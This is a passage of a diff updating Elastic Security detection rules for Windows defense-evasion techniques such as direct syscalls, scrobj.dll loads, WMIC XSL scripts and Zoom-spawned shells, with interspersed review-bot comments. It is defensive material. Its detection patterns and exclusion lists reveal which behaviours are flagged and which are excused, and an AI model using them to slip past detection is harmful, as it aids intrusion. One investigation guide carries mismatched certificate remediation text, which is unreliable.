@@ -39,7 +67,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -86,5 +114,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_managedcode_host_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_managedcode_host_process.json index 75b897a107446..975b1e7a70b5e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_managedcode_host_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_managedcode_host_process.json @@ -16,6 +16,28 @@ "references": [ "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "acf738b5-b5b2-4acc-bad9-1e18ee234f40", "severity": "high", @@ -44,5 +66,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.json index d33620cbbf63b..de6ec9b91b7d9 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.json @@ -16,14 +16,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "High Number of Okta User Password Reset or Unlock Attempts", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and\n event.action:(system.email.account_unlock.sent_message or system.email.password_reset.sent_message or\n system.sms.send_account_unlock_message or system.sms.send_password_reset_message or\n system.voice.send_account_unlock_call or system.voice.send_password_reset_call or\n user.account.unlock_token)\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e90ee3af-45fc-432e-a850-4a58cf14a457", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -87,5 +106,5 @@ "value": 5 }, "type": "threshold", - "version": 5 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_access_direct_syscall.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_access_direct_syscall.json
index 6073f402771af..054f305bf55b9 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_access_direct_syscall.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_access_direct_syscall.json
@@ -11,14 +11,37 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n \n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace : (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\", \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is\nmalicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system\ncalls to bypass security solutions that rely on hooks.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting\nSSL traffic. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "unknown" + }, + 
{ + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_creation_calltrace.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_creation_calltrace.json index 82541efacbd06..92ff9970ce66f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_creation_calltrace.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_process_creation_calltrace.json 
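Review bot: The new investigation guide's "False positive analysis" and "Response and remediation" sections talk about applications that install root certificates for SSL inspection and about removing a malicious certificate from the root certificate store, which does not match this rule's subject (process access from an unknown memory region via direct system calls) and reads as carried over from a certificate-related guide; the FP text should instead describe the exclusions the query now carries (the security-product, WebView2 and Acrobat targets) and how an analyst adds a similar exception, and the certificate step should be dropped from remediation. The `setup` text covers only the `event.ingested` fallback, while the query depends on Sysmon ProcessAccess events (`event.code == "10"`, `winlog.event_data.CallTrace` and `winlog.event_data.TargetImage`, all listed in `required_fields` as non-ECS fields of type `unknown`); a sentence such as `Requires Sysmon with ProcessAccess (Event ID 10) logging enabled, ingested so that winlog.event_data.CallTrace and winlog.event_data.TargetImage are populated.` would make that dependency explicit. The added `TargetImage` and `process.executable` exclusions are keyed on file paths alone, so the guide should note that their assurance rests on the path rather than on the binary's signer, which is the usual caveat for path-based tuning exceptions.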
@@ -11,7 +11,59 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Creation CallTrace", - "query": "sequence by host.id with maxspan=1m\n [process where event.code == \"1\" and\n /* sysmon process creation */\n process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"mshta.exe\",\n \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\")] by process.parent.entity_id, process.entity_id\n [process where event.code == \"10\" and\n /* Sysmon process access event from unknown module */\n winlog.event_data.CallTrace : \"*UNKNOWN*\"] by process.entity_id, winlog.event_data.TargetProcessGUID\n", + "query": "sequence by host.id with maxspan=1m\n [process where event.code == \"1\" and\n /* sysmon process creation */\n process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\", \"fltldr.exe\",\n \"mspub.exe\", \"msaccess.exe\",\"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") and\n\n /* noisy FP patterns */\n not (process.parent.name : \"EXCEL.EXE\" and process.executable : \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office*\\\\ADDINS\\\\*.exe\") and\n not (process.executable : \"?:\\\\Windows\\\\splwow64.exe\" and process.args in (\"8192\", \"12288\") and process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\")) and\n not (process.parent.name : \"rundll32.exe\" and process.parent.args : (\"?:\\\\WINDOWS\\\\Installer\\\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc\", \"--no-sandbox\")) and\n not (process.executable :\n (\"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat 
DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\DWWIN.EXE\") and\n process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\")) and\n not (process.parent.name : \"regsvr32.exe\" and process.parent.args : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\"))\n ] by process.parent.entity_id, process.entity_id\n [process where event.code == \"10\" and\n /* Sysmon process access event from unknown module */\n winlog.event_data.CallTrace : \"*UNKNOWN*\"] by process.entity_id, winlog.event_data.TargetProcessGUID\n", + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetProcessGUID", + "type": "unknown" + } + ], "risk_score": 43, "rule_id": "3ed032b2-45d8-4406-bc79-7ad1eabb2c72", "severity": "medium", @@ -40,5 +92,5 @@ } ], "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_scrobj_load.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_scrobj_load.json index 7af9829cb43f5..be6001b156a9a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_scrobj_load.json 
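Review bot: The new `regsvr32.exe` carve-out in the first sequence step is far broader than the other `/* noisy FP patterns */` entries: `not (process.parent.name : "regsvr32.exe" and process.parent.args : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*"))` drops the whole sequence whenever any parent argument starts with a Program Files path, so a DLL registered from a user-writable subdirectory under Program Files is never correlated with the later CallTrace event. The other carve-outs are pinned to a specific executable or argument value; this one should either be narrowed to the installer components that produced the noise or carry a comment naming the product so the exclusion can be revisited. It would also help to state in the commit why `powershell.exe` and `pwsh.exe` were removed from the `process.parent.name` list, since that silently narrows coverage of the first step.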
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_scrobj_load.json 
@@ -10,7 +10,39 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Script Object Execution", - "query": "sequence by process.entity_id with maxspan=2m\n [process where event.type == \"start\" \n and (process.code_signature.subject_name in (\"Microsoft Corporation\", \"Microsoft Windows\") and \n process.code_signature.trusted == true) and\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\cscript.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\cscript.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\",\n \"?:\\\\Windows\\\\system32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\system32\\\\taskhostw.exe\",\n \"?:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\windows\\\\SysWOW64\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\system32\\\\wscript.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wscript.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\cmd.exe\")]\n [library where event.type == \"start\" and dll.name : \"scrobj.dll\"]\n", + "query": "sequence by process.entity_id with maxspan=2m\n [process where event.type == \"start\"\n and (process.code_signature.subject_name in (\"Microsoft Corporation\", \"Microsoft Windows\") and\n process.code_signature.trusted == true) and\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\cscript.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\cscript.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\",\n 
\"?:\\\\Windows\\\\system32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\system32\\\\taskhostw.exe\",\n \"?:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\windows\\\\SysWOW64\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\system32\\\\wscript.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wscript.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\cmd.exe\")]\n [library where event.type == \"start\" and dll.name : \"scrobj.dll\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff", "severity": "medium", @@ -32,12 +64,12 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/" } ] } ], "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_short_program_name.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_short_program_name.json new file mode 100644 index 0000000000000..839b4ab494f86 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_short_program_name.json 
@@ -0,0 +1,77 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies process execution with a single character process name. This is often done by adversaries while staging or executing temporary utilities.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.*",
+ "logs-windows.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Suspicious Execution - Short Program Name",
+ "note": "",
+ "query": "process where event.type in (\"start\", \"process_started\") and length(process.name) > 0 and\n length(process.name) == 5 and host.os.name == \"Windows\" and length(process.pe.original_file_name) > 5\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "severity": "medium",
+ "tags": [
+ "Elastic",
+ "Host",
+ "Windows",
+ "Threat Detection",
+ "Defense Evasion"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1036",
+ "name": "Masquerading",
+ "reference": "https://attack.mitre.org/techniques/T1036/",
+ "subtechnique": [
+ {
+ "id": "T1036.003",
+ "name": "Rename System Utilities",
+ "reference": "https://attack.mitre.org/techniques/T1036/003/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 6
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_wmi_script.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_wmi_script.json
index 8d02b5b8e52e8..549fc01a1cbe6 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_wmi_script.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_wmi_script.json
@@ -12,7 +12,59 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious WMIC XSL Script Execution", - "query": "sequence by process.entity_id with maxspan = 2m\n[process where event.type in (\"start\", \"process_started\") and\n (process.name : \"WMIC.exe\" or process.pe.original_file_name : \"wmic.exe\") and\n process.args : (\"format*:*\", \"/format*:*\", \"*-format*:*\") and\n not process.command_line : \"* /format:table *\"]\n[library where event.type == \"start\" and dll.name : (\"jscript.dll\", \"vbscript.dll\")]\n", + "query": "sequence by process.entity_id with maxspan = 2m\n[process where event.type in (\"start\", \"process_started\") and\n (process.name : \"WMIC.exe\" or process.pe.original_file_name : \"wmic.exe\") and\n process.args : (\"format*:*\", \"/format*:*\", \"*-format*:*\") and\n not process.command_line : \"* /format:table *\"]\n[any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"jscript.dll\", \"vbscript.dll\") or file.name : (\"jscript.dll\", \"vbscript.dll\"))]\n", + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "7f370d54-c0eb-4270-ac5a-9a6020585dc6", "severity": "medium", 
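Review bot: The rewritten second sequence step drops the `event.type == "start"` constraint that the old `library where` clause carried, so on the `event.category == "library"` branch any event type now completes the sequence, not just a load. If the endpoint source only emits load events for libraries this is harmless, but it is not documented; keeping the constraint on that branch, e.g. `(event.category == "library" and event.type == "start") or (event.category == "process" and event.action : "Image loaded*")`, preserves the old semantics while adding the Sysmon path. If the Sysmon branch genuinely cannot be constrained the same way, a short `/* ... */` comment in the query saying so would stop the next reader from re-adding it.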
@@ -41,5 +93,5 @@ } ], "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_zoom_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_zoom_child_process.json index ea6a7027592be..9705528b13dd2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_zoom_child_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_zoom_child_process.json 
@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Zoom Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.parent.name : \"Zoom.exe\" and process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -48,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_system_critical_proc_abnormal_file_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_system_critical_proc_abnormal_file_activity.json index eac0233b1e76a..b7ced339d4ed0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_system_critical_proc_abnormal_file_activity.json 
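Review bot: `"note"` is replaced by the empty string rather than removed once its content moved to `setup`, leaving a blank field in the rule; the same pattern appears in the timestomp_touch, unusual_ads_file_creation and unusual_dir_ads hunks below. If the rule schema requires the key, a short triage note is more useful than `""` — for this rule, which Zoom components are expected to spawn a shell and what to check in `process.args` before dismissing an alert. If the key is optional, dropping it is cleaner than keeping an empty value.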
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_system_critical_proc_abnormal_file_activity.json 
@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Executable File Creation by a System Critical Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these\ncharacteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation\nof a vulnerability or a malicious process masquerading as a system-critical process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
